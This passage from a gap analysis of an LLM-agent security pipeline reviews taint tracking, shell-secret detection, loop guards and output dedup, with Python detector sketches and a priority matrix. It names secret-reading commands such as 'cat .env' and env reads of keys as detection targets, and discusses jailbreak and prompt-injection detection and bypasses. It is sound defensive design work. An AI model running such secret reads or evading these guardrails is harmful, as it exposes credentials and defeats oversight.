Missing: Factual grounding check. For RAG applications, verify the output is grounded in the retrieved context. Detect when the LLM ignores the context and hallucinates.
Missing: Jailbreak success detection. If detect_injection flagged the input but the LLM responded anyway (not blocked), check if the response actually complied with the injection. This is what the LLM judge should specifically look for.
Improvement: Streaming-compatible scanning. Current scan requires the full response. For streaming, implement incremental scanning with a sliding window.
Missing: Output format validation. If the agent expects JSON, validate the output is valid JSON before returning. Malformed output causes agent crashes.

Priority: HIGH (toxicity/content safety is a major gap and is required by the EU AI Act)
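
Incremental scanning with a sliding window could work roughly as follows: keep the last `overlap` characters of the stream, prepend them to each new chunk, and de-duplicate matches by absolute offset. The sketch assumes no match is longer than `overlap` and uses one AWS key regex as a stand-in for the full scanner; `StreamScanner` is a hypothetical name.

```python
import re


class StreamScanner:
    """Scans streamed text chunk by chunk, catching matches that span chunks."""

    def __init__(self, pattern: str, overlap: int):
        self.pattern = re.compile(pattern)
        self.overlap = overlap      # must be >= the longest possible match
        self.tail = ""              # trailing text carried over between chunks
        self.tail_start = 0         # absolute stream offset of tail[0]
        self.seen = set()           # absolute start offsets already reported

    def feed(self, chunk: str) -> list[str]:
        """Return matches that became visible with this chunk."""
        window = self.tail + chunk
        hits = []
        for match in self.pattern.finditer(window):
            absolute = self.tail_start + match.start()
            if absolute not in self.seen:
                self.seen.add(absolute)
                hits.append(match.group())
        keep = window[-self.overlap:] if self.overlap > 0 else ""
        self.tail_start += len(window) - len(keep)
        self.tail = keep
        return hits
```

Detection is the easy half. Redaction in a stream is harder because text that has already been sent cannot be recalled, so a real implementation would likely hold back the last `overlap` characters before emitting them.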

18. `taint_check`. Taint Tracking

Current: Tracks PII and secrets from input. Checks if they flow into tool call arguments. Categorized sinks (shell, network, code, email, database).

Strengths: Taint tracking is rare in LLM security. Sink categorization is thoughtful.

Gaps & Recommendations:

Missing: Taint propagation through tool chains. In a multi-step agent, data flows: input → tool1 → tool2 → tool3. Current implementation only tracks input → first tool call. Need cross-step propagation.
Missing: Derived data tracking. If the LLM sees john@acme.com and generates john at acme dot com, the taint is lost. Add fuzzy matching for derived forms.
Improvement: Configurable sink sensitivity. Not all sinks are equal. Writing to a local log file is less dangerous than sending via email. Allow per-sink on_detection overrides.

Priority: MEDIUM (multi-step propagation is the most impactful improvement)
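
Derived-form matching for the email example can start as a canonicalization pass applied to both the tainted value and the sink argument. The sketch below only handles "at"/"dot" spellings and case; it is a narrow illustration, not general fuzzy matching, and `canonicalize` and `tainted_values_in` are hypothetical names.

```python
import re


def canonicalize(text: str) -> str:
    """Fold common obfuscated email spellings back to '@' and '.'."""
    folded = text.lower()
    folded = re.sub(r"\s*(?:\(at\)|\[at\]|\bat\b)\s*", "@", folded)
    folded = re.sub(r"\s*(?:\(dot\)|\[dot\]|\bdot\b)\s*", ".", folded)
    return folded


def tainted_values_in(tainted: list[str], argument: str) -> list[str]:
    """Return tainted values that appear in the argument after canonicalization."""
    folded_argument = canonicalize(argument)
    return [value for value in tainted
            if canonicalize(value) in folded_argument]
```

The rewrite is lossy on ordinary prose ("meet at noon" becomes "meet@noon"), which is acceptable here because the folded text is only used for a containment check against known tainted values and is never shown to anyone.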

19. `shell_bleed`. Shell Bleed Detection

Current: Env var detection across 5 languages (including Shell, Python, Node, Ruby), safe var exclusion, secret keyword matching.

Strengths: Multi-language support is comprehensive.

Gaps & Recommendations:

Missing: .env file reference detection. cat .env, source .env, dotenv.config(). References to dotenv files are as dangerous as direct env var references.
Missing: Config file secret references. config.yaml, secrets.json, credentials.xml references in generated code.
Missing: Rust/Go/Java env var patterns. std::env::var("SECRET"), os.Getenv("API_KEY"), System.getenv("DB_PASSWORD").
Improvement: Detect secrets embedded in code. Not env vars but hardcoded secrets: api_key = "sk-..." in generated code.

Priority: LOW (current coverage handles the most common languages)
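
The Rust, Go, and Java patterns listed above translate directly into regexes. The sketch below mirrors the existing safe-var exclusion and secret-keyword matching with small illustrative lists; `find_env_reads` is a hypothetical name and only string-literal variable names are handled.

```python
import re

NAME = r'"([A-Za-z_][A-Za-z0-9_]*)"'
ENV_READ_PATTERNS = {
    "rust": re.compile(r"\b(?:std::)?env::var(?:_os)?\(\s*" + NAME),
    "go": re.compile(r"\bos\.(?:Getenv|LookupEnv)\(\s*" + NAME),
    "java": re.compile(r"\bSystem\.getenv\(\s*" + NAME),
}
SECRET_KEYWORDS = ("SECRET", "KEY", "TOKEN", "PASSWORD")  # illustrative
SAFE_VARS = {"HOME", "PATH", "LANG"}                      # illustrative


def find_env_reads(code: str) -> list[tuple[str, str]]:
    """Return (language, variable) for env reads whose name looks secret."""
    hits = []
    for language, pattern in ENV_READ_PATTERNS.items():
        for match in pattern.finditer(code):
            name = match.group(1)
            if name in SAFE_VARS:
                continue
            if any(keyword in name.upper() for keyword in SECRET_KEYWORDS):
                hits.append((language, name))
    return hits
```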

20. `loop_guard`. Loop Guard

Current: Per-session tracking, identical call counting, warning injection, circuit breaking, max total calls.

Strengths: Warning before blocking is good UX. Max total calls prevents cost runaway.

Gaps & Recommendations:

Missing: Semantic loop detection. Agent calls search("AI market") then search("AI market trends") then search("market for AI"): different strings, same intent. Use embedding similarity to detect semantic loops.
Missing: Progress tracking. A legitimate agent might call the same tool 10 times with different params (iterating over a list). Detect lack of progress rather than just repetition.
Improvement: Cross-session loop detection. If an agent hits the loop limit, gets restarted, and immediately loops again, detect the meta-loop.

Priority: LOW (current implementation handles the common case well)
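
To show the shape of semantic loop detection without pulling in an embedding model, the sketch below substitutes token-set Jaccard similarity for embedding similarity. That is a much cruder stand-in (it cannot see synonyms), but the control flow is the same: compare the new call against recent calls and count near-duplicates. The stopword list, threshold, and function names are assumptions.

```python
import re

STOPWORDS = {"for", "the", "of", "a", "an", "in", "on"}  # illustrative


def intent_tokens(query: str) -> set[str]:
    """Lowercased content words of a query."""
    words = re.findall(r"[a-z0-9]+", query.lower())
    return {w for w in words if w not in STOPWORDS}


def jaccard(a: set, b: set) -> float:
    """Size of the intersection over size of the union."""
    union = a | b
    return len(a & b) / len(union) if union else 1.0


def count_similar_calls(history: list[str], new_query: str,
                        threshold: float = 0.6) -> int:
    """How many earlier queries look like the same intent as the new one."""
    new_tokens = intent_tokens(new_query)
    return sum(1 for past in history
               if jaccard(intent_tokens(past), new_tokens) >= threshold)
```

On the example above, "market for AI" scores 1.0 against "AI market" and about 0.67 against "AI market trends", so both earlier calls count as repeats even though no two strings are identical.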

21. `dedup_output`. Output Dedup

Current: Exact + normalized matching against tool results and input. Configurable min length.

Strengths: Catches the common “LLM copies tool output verbatim” failure mode.

Gaps & Recommendations:

Missing: Partial dedup. LLM copies 80% of tool output with minor modifications. Current implementation only catches exact/normalized matches.
Improvement: Token-based dedup. Measure output tokens that are direct copies of input tokens. If >70% are copies, flag it. More robust than string matching.

Priority: LOW (nice-to-have, not security-critical)
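
Token-based dedup can be approximated with the standard library's `difflib.SequenceMatcher` over whitespace tokens. The sketch counts output tokens that fall inside copied runs of at least `min_run` tokens, so isolated common words do not inflate the ratio. Whitespace tokenization and the `copied_fraction` name are assumptions; a model tokenizer could be swapped in.

```python
from difflib import SequenceMatcher


def copied_fraction(source: str, output: str, min_run: int = 3) -> float:
    """Fraction of output tokens that sit in runs copied verbatim from source."""
    src_tokens = source.split()
    out_tokens = output.split()
    if not out_tokens:
        return 0.0
    matcher = SequenceMatcher(None, src_tokens, out_tokens, autojunk=False)
    copied = sum(block.size for block in matcher.get_matching_blocks()
                 if block.size >= min_run)
    return copied / len(out_tokens)
```

An output that changes one word in a nine-word tool result scores 8/9, well above the 70% threshold suggested above, while the existing exact and normalized matchers would miss it.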

Cross-Cutting Gaps (Not in Any Single Step)

A. Observability & Metrics

Missing: Prometheus/OpenTelemetry metrics export. Step latency histograms, detection counts by type, block rates. Essential for production monitoring.
Missing: Detection trend dashboards. “Injection attempts increased 300% this week.” Time-series analysis of security events.

B. Testing & Validation

Missing: Red team automation. Built-in adversarial testing that runs the HackAPrompt, Gandalf, and custom attack datasets against the pipeline. Giskard provides this.
Missing: Regression testing. When a pattern is updated, automatically verify it still catches known attacks and doesn’t introduce new FPs.

C. Response to Detection

Missing: Automated incident response. When a high-severity detection occurs, automatically: revoke agent API key, notify CISO via webhook, quarantine conversation. Currently all responses are per-request.
Missing: Adaptive security posture. If injection attempts increase, automatically tighten thresholds across the pipeline. Return to normal after the attack subsides.

D. Privacy & Compliance

Missing: Data minimization. GDPR requires processing only necessary data. Log and store only what’s needed. Currently audit logs may contain more data than necessary.
Missing: Right to erasure. GDPR Article 17. Ability to delete all data for a specific user across audit logs, pipeline state, and findings.
Missing: Data Processing Agreement (DPA) enforcement. When routing to an LLM provider, verify the provider has a valid DPA. Block calls to non-compliant providers.

Priority Matrix

Priority	Steps / Gaps	Impact
CRITICAL	ML-based injection classifier	Catches novel attacks regex never will
HIGH	Multimodal input validation	Vision models are becoming default
HIGH	EU multi-language PII	Core positioning as European product
HIGH	Secret verification	Transforms FYI into actionable alert
HIGH	Tool definition integrity	MCP supply chain attacks are growing
HIGH	Toxicity/content safety	Required by EU AI Act
HIGH	Command chaining in scan_tool_calls	Common bypass technique
HIGH	Tool execution sandboxing	#1 missing capability for agents
MEDIUM	Adaptive rate limiting	Threat-responsive defense
MEDIUM	Per-model budget splits	Most requested by CISOs
MEDIUM	Custom classification rules	Enterprise customization
MEDIUM	Streaming LLM support	Developer experience
MEDIUM	Multi-step taint propagation	Agentic workflow security
MEDIUM	Time-based permissions	Enterprise IAM standard
MEDIUM	Cloud resource ID detection	Common infrastructure leak
LOW	Semantic loop detection	Nice-to-have
LOW	Additional shell bleed languages	Diminishing returns
LOW	Unicode script allowlists	Current impl is strong
LOW	Partial dedup	Not security-critical
